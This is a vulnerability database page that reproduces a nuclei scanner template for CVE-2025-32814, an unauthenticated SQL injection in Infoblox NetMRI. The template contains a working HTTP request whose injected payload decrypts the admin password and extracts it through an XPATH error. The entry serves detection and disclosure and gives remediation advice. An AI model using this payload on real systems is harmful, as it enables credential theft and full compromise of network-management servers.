Lucene search
K

NetMRI Unauthenticated SQL Injection via skipjackUsername

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

NetMRI before 7.6.1 has critical unauthenticated SQL injection vulnerability via skipjackUsername

Related
Refs
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the NetMRI network monitoring program lies in its failure to protect the SQL query structure, allowing attackers to execute arbitrary code.
15 Jul 202500:00
bdu_fstec
Circl
CVE-2025-32814
22 May 202515:48
circl
CNNVD
Infoblox NETMRI 安全漏洞
22 May 202500:00
cnnvd
CVE
CVE-2025-32814
22 May 202500:00
cve
Cvelist
CVE-2025-32814
22 May 202500:00
cvelist
EUVD
EUVD-2025-16146
22 May 202515:34
euvd
NCSC
Vulnerabilities fixed in Infoblox NETMRI
23 May 202508:55
ncsc
NVD
CVE-2025-32814
22 May 202515:16
nvd
OSV
CVE-2025-32814
22 May 202515:16
osv
Positive Technologies
PT-2025-22491 · Infoblox · Infoblox Netmri
21 May 202500:00
ptsecurity
Rows per page
id: CVE-2025-32814

info:
  name: NetMRI Unauthenticated SQL Injection via skipjackUsername
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.
  impact: |
    Unauthenticated attackers can extract sensitive data including encrypted passwords through SQL injection in the skipjackUsername parameter, potentially leading to complete system compromise.
  remediation: |
    Upgrade to Infoblox NetMRI version 7.6.1 or later that properly sanitizes SQL input parameters.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32814
    - https://rhinosecuritylabs.com/research/infoblox-multiple-cves/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-32814
    cwe-id: CWE-89
    epss-score: 0.36412
    epss-percentile: 0.98297
    cpe: cpe:2.3:a:infoblox:netmri:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: infoblox
    product: netmri
    fofa-query: icon_hash="-319724102"
  tags: cve,cve2025,sqli,unauth,netmri,rails,error-based,vkev,vuln

http:
  - raw:
      - |
        GET /netmri/config/userAdmin/login.tdf?skipjackUsername=admin%22+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=%22admin%22),%22password%22,1),CHAR(126)),null)--%22&skipjackPassword=anything&weakPassword=true&eulaAccepted=Accept&mode=DO-LOGIN HTTP/1.1
        Host: {{Hostname}}


    extractors:
      - type: regex
        part: body
        name: password
        group: 1
        regex:
          - "XPATH syntax error: '~(.*?)~'"
        internal: true

      - type: dsl
        dsl:
          - "'Password: ' + password"

    matchers:
      - type: word
        part: body
        words:
          - 'XPATH syntax error:'
# digest: 4a0a0047304502204db99be307197aafd2c49228963328e66418b6ecce77d4bde30a97f7edfef67c022100a9fbdc7ed03f4d5df05ff14b4a91f6278b0c975b96135b9fd0228b844eee6052:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.36412
SSVC
23